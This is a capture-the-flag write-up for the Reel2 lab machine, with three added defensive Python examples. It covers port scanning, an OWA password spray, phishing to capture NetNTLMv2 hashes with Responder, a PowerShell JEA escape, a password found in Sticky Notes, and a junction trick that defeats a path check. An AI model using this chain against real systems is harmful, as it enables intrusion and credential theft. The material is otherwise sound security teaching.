- Info Card :
- 0x1 - Recon
- 0x1.1 - Port scanning
- Masscan port scan :
- Nmap port scan :
- 0x3 - Web server enumeration
- 0x3.1 - Fuzzing Web directories
- 0x3.2 - Recon on port 8080
- 0x3.3 - Grabbing users and passwords
- 0x4 - Intrusion in OWA
- 0x4.1 - Bruteforcing OWA
- 0x5 - Foothold
- 0x5.1 - Phishing
- 0x5.2 - Make a PSSession to get a shell
- 0x7 - Bypass JEA restriction
- 0x7.2 - Escaping from JEA
- 0x8 - Lateral Privilege Escalation
- Reel2 has been pwned !
Info Card :
0x1 - Recon
0x1.1 - Port scanning
Masscan port scan :
sudo masscan -p1-65535,U:1-65535 10.129.49.89 --rate=10000 -e tun0
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-06-06 13:12:52 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 6010/tcp on 10.129.49.89
Discovered open port 6017/tcp on 10.129.49.89
Discovered open port 80/tcp on 10.129.49.89
Discovered open port 6012/tcp on 10.129.49.89
Discovered open port 6006/tcp on 10.129.49.89
Discovered open port 6004/tcp on 10.129.49.89
Discovered open port 6011/tcp on 10.129.49.89
Discovered open port 443/tcp on 10.129.49.89
Discovered open port 6005/tcp on 10.129.49.89
Discovered open port 6002/tcp on 10.129.49.89
Discovered open port 6001/tcp on 10.129.49.89
Discovered open port 8080/tcp on 10.129.49.89
Discovered open port 6167/tcp on 10.129.49.89
Discovered open port 5985/tcp on 10.129.49.89
Discovered open port 6007/tcp on 10.129.49.89
Nmap port scan :
nmap -sCV -v -T4 -p 80,443,6001,6002,6004,6005,6006,6007,8080 reel2.htb -oN reel2.nmap -Pn
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
|_http-title: 403 - Forbidden: Access is denied.
443/tcp open ssl/https?
| ssl-cert: Subject: commonName=Reel2
| Subject Alternative Name: DNS:Reel2, DNS:Reel2.htb.local
| Issuer: commonName=Reel2
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2020-07-30T10:12:46
| Not valid after: 2025-07-30T10:12:46
| MD5: aa49 5cac 7115 c7fe 0628 2a6b 0124 37c4
|_SHA-1: d7ea 2696 a56f 09cb 24ce 557f 830e 86ec 5f63 0f2d
|_ssl-date: 2021-06-06T13:20:21+00:00; +5s from scanner time.
6001/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6002/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6004/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6005/tcp open msrpc Microsoft Windows RPC
6006/tcp open msrpc Microsoft Windows RPC
6007/tcp open msrpc Microsoft Windows RPC
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.2.32)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.2.32
|_http-title: Welcome | Wallstant
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 4s
0x3 - Web server enumeration
On port 443 we find an IIS (Internet Information Services) web server.
On port 80 we don't have access (403 Forbidden).
0x3.1 - Fuzzing Web directories
I will use the gobuster tool to fuzz the web directories and find directories we don't know about.
dir : directory enumeration mode
-u : URL
-w : wordlist
-x : extensions to try
-k : skip SSL/TLS certificate verification
-t : number of threads
gobuster dir -u https://reel2.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,sql,txt -k -t 64
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://reel2.htb/
[+] Method: GET
[+] Threads: 64
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,sql,txt
[+] Timeout: 10s
===============================================================
2021/06/06 15:28:14 Starting gobuster in directory enumeration mode
===============================================================
/public (Status: 302) [Size: 144] [--> https://reel2.htb/owa]
/exchange (Status: 302) [Size: 144] [--> https://reel2.htb/owa]
/Public (Status: 302) [Size: 144] [--> https://reel2.htb/owa]
/rpc (Status: 401) [Size: 13]
/owa (Status: 301) [Size: 0] [--> /owa/]
/Exchange (Status: 302) [Size: 144] [--> https://reel2.htb/owa]
/ecp (Status: 301) [Size: 145] [--> https://reel2.htb/ecp/]
/RPC (Status: 401) [Size: 13]
/ews (Status: 301) [Size: 145] [--> https://reel2.htb/ews/]
/PUBLIC (Status: 302) [Size: 144] [--> https://reel2.htb/owa]
/exchweb (Status: 302) [Size: 144] [--> https://reel2.htb/owa]
We can see a /owa directory, which is Outlook Web Access.
So we have an OWA login page waiting for us; maybe this can help us later if we get some credentials.
Let's continue our enumeration on port 8080.
0x3.2 - Recon on port 8080
On port 8080 we find a page where you can log in and register.
Let's create an account and see what happens.
0x3.3 - Grabbing users and passwords
After registration we are redirected to the /home page,
and we can identify users on /search.
You can get all users with this command :
curl http://reel2.htb:8080/search | grep user_follow_box_a | grep -oP '<p>(.*?</span)' | sed 's/<p>//g' | sed "s/<br><span style='color:gray;'>@//g" | sed 's/<\/span//g'
We save the output to a file.
But something is wrong: the names contain spaces, and an OWA username doesn't. We need to combine the first and last names of each user into the username format, so that the list is correct and we can possibly bruteforce it.
This can be done with a small script or simply by hand, with the same result.
By looking at some users' posts we can generate a wordlist from variants of these words.
Keywords :
fika
2020
summer
hot
I would also recommend taking words from rockyou.txt, in case our theory is not correct :
grep summer /usr/share/wordlists/rockyou.txt ; grep fika /usr/share/wordlists/rockyou.txt
And we can append them to the end of our wordlist.
0x4 - Intrusion in OWA
0x4.1 - Bruteforcing OWA
We can use SprayingToolkit to try to bruteforce OWA :
git clone https://github.com/byt3bl33d3r/SprayingToolkit
cd SprayingToolkit/
sudo -H pip3 install -r requirements.txt
python3 atomizer.py owa reel2.htb ../wordlist.txt ../user.txt --interval 0:00:01
[*] Trying to find autodiscover URL
[+] Using OWA autodiscover URL: https://reel2.htb/autodiscover/autodiscover.xml
[+] OWA domain appears to be hosted internally
[+] Got internal domain name using OWA: HTB
[*] Starting spray at 2021-06-06 14:40:43 UTC
[+] Found credentials: s.svensson:Summer2020
[+] Dumped 1 valid accounts to owa_valid_accounts.txt
We can already stop our bruteforce because we found valid credentials :
[+] Found credentials: s.svensson:Summer2020
And we can log in to OWA.
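The spray above works because a single password is tried against many accounts, so no single account ever reaches its lockout threshold. The following is an added example, not part of this write-up or of SprayingToolkit, showing how a defender would spot the same activity in OWA authentication logs: it keys on the number of distinct accounts failing from one client IP inside a short window, then lists which accounts that IP managed to log into. The log format and the sample events are constructed for the example.

```python
# Added example (not from the write-up or SprayingToolkit): flagging a password
# spray against OWA from the defender's side. A spray tries one password against
# many accounts, so each account sees only a failure or two and per-account
# lockout never fires; the signal is instead the number of DISTINCT accounts
# that fail from one client IP inside a short window.
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events in an assumed export format, one per line:
# "<ISO-8601 UTC timestamp> <client ip> <domain\user> <FAIL|SUCCESS>".
# 10.10.14.5 sprays one password across accounts; 10.10.14.9 just retries one.
SAMPLE_LOG = """\
2021-06-06T14:40:43Z 10.10.14.5 htb\\a.anderson FAIL
2021-06-06T14:40:44Z 10.10.14.5 htb\\b.berg FAIL
2021-06-06T14:40:45Z 10.10.14.5 htb\\c.carlsson FAIL
2021-06-06T14:40:46Z 10.10.14.5 htb\\d.dahl FAIL
2021-06-06T14:40:47Z 10.10.14.5 htb\\e.ek FAIL
2021-06-06T14:40:48Z 10.10.14.5 htb\\s.svensson SUCCESS
2021-06-06T14:41:10Z 10.10.14.9 htb\\k.svensson FAIL
2021-06-06T14:41:20Z 10.10.14.9 htb\\k.svensson FAIL
2021-06-06T14:41:30Z 10.10.14.9 htb\\k.svensson SUCCESS
"""


def parse_line(line):
    """Split one event into (timestamp, client ip, user, result)."""
    ts, ip, user, result = line.split()
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), ip, user.lower(), result


def parse_log(log_text):
    """All events of the log, oldest first."""
    return sorted(parse_line(l) for l in log_text.splitlines() if l.strip())


def detect_spray(log_text, window=timedelta(minutes=5), min_users=5):
    """Map each spraying client IP to the sorted accounts it failed against.

    An IP is flagged when some window-long span of its failures covers at
    least min_users different accounts. Repeated failures on one account
    (plain brute force) do not trip this rule and belong to a separate one."""
    failures = defaultdict(list)          # ip -> [(ts, user), ...] oldest first
    for ts, ip, user, result in parse_log(log_text):
        if result == "FAIL":
            failures[ip].append((ts, user))
    alerts = {}
    for ip, fails in failures.items():
        start = 0
        for end in range(len(fails)):     # slide a window over this IP's failures
            while fails[end][0] - fails[start][0] > window:
                start += 1
            users = {u for _, u in fails[start:end + 1]}
            if len(users) >= min_users:
                alerts[ip] = sorted(users)
                break
    return alerts


def compromised_accounts(log_text, alerts):
    """Successful logons from a flagged IP: the accounts to reset first."""
    return sorted({(ip, user) for ts, ip, user, result in parse_log(log_text)
                   if result == "SUCCESS" and ip in alerts})


if __name__ == "__main__":
    found = detect_spray(SAMPLE_LOG)
    for ip, users in found.items():
        print(f"spray from {ip}: {len(users)} accounts tried, e.g. {users[:3]}")
    for ip, user in compromised_accounts(SAMPLE_LOG, found):
        print(f"successful logon from spraying host {ip}: {user}")
```

The window and threshold are tuning knobs: a tool that sleeps between attempts, like the --interval option used above, only lengthens the window a defender needs, it does not change the distinct-account signature. The second host in the sample, which hammers one account, is deliberately not flagged by this rule; that pattern is what per-account lockout already catches.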
0x5 - Foothold
0x5.1 - Phishing
You can find all users here (right-click on a user to send them a mail).
We will try to send a fake email containing an "important document" link that points to our IP address, in order to capture a user's NetNTLMv2 hash.
I used Responder to capture the hash :
sudo responder -I tun0
And we got the NetNTLMv2 hash of htb\k.svensson :
[HTTP] NTLMv2 Client : 10.129.49.89
[HTTP] NTLMv2 Username : htb\k.svensson
[HTTP] NTLMv2 Hash : k.svensson::htb:71015fa9e0cdd20c...
We will try to crack it with john.
It worked, so we have the password of k.svensson :
User : k.svensson
Pass : kittycat1
0x5.2 - Make a PSSession to get a shell
Evil-WinRM failed to give us access to the box, so we switch to PowerShell on Linux
and create a PSSession to the target machine.
Here are the Microsoft docs on creating a new PSSession.
sudo apt install gss-ntlmssp
sudo apt install pwsh
We have a shell on the machine, but we don't seem to have the right to execute anything: a simple "whoami" did not work.
0x7 - Bypass JEA restriction
What is JEA ?
JEA (Just Enough Administration) is a security technology that enables delegated administration for anything managed by PowerShell. With JEA, a system administrator can:
- Reduce the number of administrators on your machines by granting them specific privileges
- Limit what users can do by specifying which cmdlets, functions, and external commands they can run.
According to the restricted language documentation, "All elements of the PowerShell scripting language are allowed." So we can try to define a function that wraps the command we want :
function default { whoami }
But we can also bypass the restriction with a PowerShell script block :
& { whoami }
POC :
So we can get the user flag!
0x7.2 - Escaping from JEA
We will upload the Windows executable of netcat to the machine and run it.
0x8 - Lateral Privilege Escalation
Now that we have a fairly stable shell we will be able to privesc without too much trouble.
First of all we find two files : a role capability file and a session configuration file.
We can also see that Sticky Notes is installed on the machine.
The .psrc extension is a PowerShell role capability data file that lists all the cmdlets, functions, providers, and external programs available to the role.
The .pssc file is a PowerShell session configuration.
type jea_test_account.pssc
@{
SchemaVersion = '2.0.0.0'
GUID = 'd6a39756-aa53-4ef6-a74b-37c6a80fd796'
Author = 'cube0x0'
SessionType = 'RestrictedRemoteServer'
RunAsVirtualAccount = $true
RoleDefinitions = @{
'htb\jea_test_account' = @{
'RoleCapabilities' = 'jea_test_account' } }
LanguageMode = 'NoLanguage'
}
The configuration includes RunAsVirtualAccount, which means that the role defined for htb\jea_test_account runs its management functions under a temporary virtual account. We also see that the session is in NoLanguage mode, which means we cannot reuse the previous bypass.
type jea_test_account.psrc
@{
GUID = '08c0fdac-36ef-43b5-931f-68171c4c8200'
Author = 'cube0x0'
CompanyName = 'Unknown'
Copyright = '(c) 2020 cube0x0. All rights reserved.'
FunctionDefinitions = @{
'Name' = 'Check-File'
'ScriptBlock' = {param($Path,$ComputerName=$env:COMPUTERNAME)
[bool]$Check=$Path -like "D:\*" -or $Path -like "C:\ProgramData\*" ;
if($check) {get-content $Path}} }
}
This shows that a custom Check-File function is defined, which allows the user jea_test_account to read the plaintext content of files under the D: drive or the C:\ProgramData folder and their subfolders. We assume that the name of the JEA configuration file is also the ConfigurationName of the JEA policy.
So I have to find the password of jea_test_account to use it over PS Remoting.
Remember that a Sticky Notes shortcut was present in the Documents folder: maybe by looking at the user's notes we can find something interesting.
The usual path of the Sticky Notes data is : C:\Users\k.svensson\AppData\Roaming\stickynotes\Local Storage\leveldb\
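The two files above are the whole security policy of this endpoint: LanguageMode decides whether the function-definition and script-block trick from the previous section is possible at all, RunAsVirtualAccount decides what rights an exposed function runs with, and FunctionDefinitions is the attack surface a connecting user gets. The following is an added example, not part of this write-up, of a small static audit that pulls those three things out of a .pssc and .psrc pair and reports them. It only pattern-matches the PowerShell data-file syntax far enough for this purpose (nested hashtables are skipped), the samples are modelled on the files shown above with placeholder GUIDs, and the function and finding names are this example's own.

```python
# Added example (not from the write-up): static audit of a JEA session
# configuration (.pssc) and role capability (.psrc). Pure Python; it does not
# evaluate PowerShell, it extracts the few settings that decide how much a
# connecting user can do. Samples are modelled on the write-up's files with
# placeholder GUIDs.
import re

PSSC = r"""@{
SchemaVersion = '2.0.0.0'
GUID = '00000000-0000-0000-0000-000000000000'
SessionType = 'RestrictedRemoteServer'
RunAsVirtualAccount = $true
RoleDefinitions = @{ 'htb\jea_test_account' = @{ 'RoleCapabilities' = 'jea_test_account' } }
LanguageMode = 'NoLanguage'
}"""

PSRC = r"""@{
FunctionDefinitions = @{
'Name' = 'Check-File'
'ScriptBlock' = {param($Path,$ComputerName=$env:COMPUTERNAME)
[bool]$Check=$Path -like "D:\*" -or $Path -like "C:\ProgramData\*" ;
if($check) {get-content $Path}} }
}"""

# One "Key = 'string'" or "Key = $true/$false" line; the key may be quoted.
SCALAR = re.compile(r"^\s*'?(\w+)'?\s*=\s*(?:'([^']*)'|(\$true|\$false))\s*$", re.M)


def parse_scalars(text):
    """Top-level scalar settings of a PowerShell data file; nested tables are skipped."""
    out = {}
    for key, quoted, boolean in SCALAR.findall(text):
        out[key] = (boolean == "$true") if boolean else quoted
    return out


def exposed_functions(psrc_text):
    """(name, declared parameters) for every FunctionDefinitions entry."""
    names = re.findall(r"'Name'\s*=\s*'([^']+)'", psrc_text)
    bodies = re.split(r"'Name'\s*=\s*'[^']+'", psrc_text)[1:]   # text after each name
    funcs = []
    for name, body in zip(names, bodies):
        m = re.search(r"param\(([^)]*)\)", body)
        params = [p.split("=")[0].strip() for p in m.group(1).split(",")] if m else []
        funcs.append((name, params))
    return funcs


def audit(pssc_text, psrc_text):
    """Human-readable findings about what the endpoint really exposes."""
    cfg = parse_scalars(pssc_text)
    findings = []
    mode = cfg.get("LanguageMode")
    if mode != "NoLanguage":
        findings.append(f"LanguageMode={mode}: function and script-block definitions are "
                        "possible, so the visible command list is not the real limit")
    if cfg.get("RunAsVirtualAccount") is True:
        findings.append("RunAsVirtualAccount=true: exposed functions run under a privileged "
                        "virtual account; review each one as privileged code")
    for name, params in exposed_functions(psrc_text):
        if params:
            findings.append(f"{name} takes caller-controlled input {params}: validate it "
                            "after resolving paths, not with a string comparison")
    return findings


if __name__ == "__main__":
    for line in audit(PSSC, PSRC):
        print("-", line)
```

On the files above this reports two things: the virtual account, and Check-File accepting a caller-controlled $Path. Swapping 'NoLanguage' for 'RestrictedLanguage' in the .pssc adds the LanguageMode finding, which is exactly the gap the function and script-block bypass earlier in this write-up went through.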
dir "C:\Users\k.svensson\AppData\Roaming\stickynotes\Local Storage\leveldb\"
Volume in drive C has no label.
Volume Serial Number is B3B4-3B84
Directory of C:\Users\k.svensson\AppData\Roaming\stickynotes\Local Storage\leveldb
06/06/2021 03:12 PM <DIR> .
06/06/2021 03:12 PM <DIR> ..
06/06/2021 03:12 PM 2,845 000003.log
07/30/2020 01:19 PM 16 CURRENT
07/30/2020 01:19 PM 0 LOCK
06/06/2021 03:12 PM 182 LOG
02/18/2021 08:17 PM 182 LOG.old
07/30/2020 01:19 PM 41 MANIFEST-000001
6 File(s) 3,266 bytes
2 Dir(s) 9,251,512,320 bytes free
We find a file "000003.log". To read its printable content we copy it to our local machine and run strings on it :
strings 000003.log
VERSION
META:app://.
_app://.
__storejs__test__Z
META:app://.
_app://.
{"first":"<p>Credentials for JEA</p><p>jea_test_account:[email protected]^%@#1</p>
","back":"rgb(255, 242, 171)","title":"rgb(255, 235, 129)","wid":"350","hei":"375",
"deleted":
"no","closed":"yes","locked":"no"}
Fortunately for us, someone left the password of jea_test_account in a note, so we can now create a new PSSession as that user :
jea_test_account:[email protected]^%@#1
Now we can create a junction inside C:\ProgramData\ that points to C:\Users\Administrator (and therefore to its Desktop), so that Check-File's path check is satisfied :
C:\ProgramData>mklink /J default C:\Users\Administrator
mklink /J default C:\Users\Administrator
Junction created for default <<===>> C:\Users\Administrator
Make a new PSSession as jea_test_account
and run Check-File on root.txt through our junction.
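The root step works because Check-File only compares the string it was handed against "C:\ProgramData\*"; a junction makes a path that passes that test resolve somewhere else entirely. The following is an added example, not part of this write-up and not PowerShell, that puts the vulnerable prefix test next to a check that resolves links before comparing. It models the mklink junction with a POSIX symlink in a temporary directory so it runs offline on Linux or macOS; the directory layout, file names and function names are this example's own.

```python
# Added example (not from the write-up): a string-prefix path check versus a
# resolving one. The Windows junction "mklink /J default C:\Users\Administrator"
# is modelled with a symlink ProgramData/default -> Administrator inside a
# temporary directory; everything here is constructed for the demonstration.
import os
import tempfile


def check_file_prefix(path, allowed_root):
    # Vulnerable: the same idea as Check-File's `-like "C:\ProgramData\*"`,
    # a text comparison on whatever string the caller supplied.
    return path.startswith(allowed_root.rstrip(os.sep) + os.sep)


def check_file_resolved(path, allowed_root):
    # Hardened: canonicalise both sides (following symlinks/junctions and
    # collapsing "..") and require the real target to sit inside the tree.
    real = os.path.realpath(path)
    root = os.path.realpath(allowed_root)
    return os.path.commonpath([real, root]) == root


def read_if_allowed(path, allowed_root, check=check_file_resolved):
    # The guarded read; returns None when the chosen check rejects the path.
    if not check(path, allowed_root):
        return None
    with open(path) as f:
        return f.read()


def demo():
    # Layout: <tmp>/ProgramData (allowed) and <tmp>/Administrator (secret),
    # then ProgramData/default -> Administrator, and a read of
    # ProgramData/default/root.txt through both checks.
    # Returns (prefix_check_read_secret, resolved_check_read_secret, legit_read_ok).
    with tempfile.TemporaryDirectory() as tmp:
        allowed = os.path.join(tmp, "ProgramData")
        secret_dir = os.path.join(tmp, "Administrator")
        os.makedirs(allowed)
        os.makedirs(secret_dir)
        with open(os.path.join(secret_dir, "root.txt"), "w") as f:
            f.write("placeholder, not a real flag\n")
        with open(os.path.join(allowed, "readme.txt"), "w") as f:
            f.write("legitimately readable\n")
        os.symlink(secret_dir, os.path.join(allowed, "default"))   # the "junction"
        via_link = os.path.join(allowed, "default", "root.txt")
        legit = os.path.join(allowed, "readme.txt")
        return (read_if_allowed(via_link, allowed, check_file_prefix) is not None,
                read_if_allowed(via_link, allowed) is not None,
                read_if_allowed(legit, allowed) is not None)


if __name__ == "__main__":
    prefix_leaks, resolved_leaks, legit_ok = demo()
    print(f"prefix check leaked the secret: {prefix_leaks}")
    print(f"resolved check leaked the secret: {resolved_leaks}")
    print(f"resolved check still allows legitimate files: {legit_ok}")
```

The resolving check also rejects plain "..\" traversal, which the prefix test lets through for the same reason. For a JEA role capability the lesson carries over directly: resolve the final target of every path component before deciding, and treat any reparse point under the allowed tree as a reason to refuse. Because the session above runs with RunAsVirtualAccount, that one comparison was the only thing between the caller and every file the virtual account could read, which is why a weak check in a tiny helper function ended up exposing the Administrator profile.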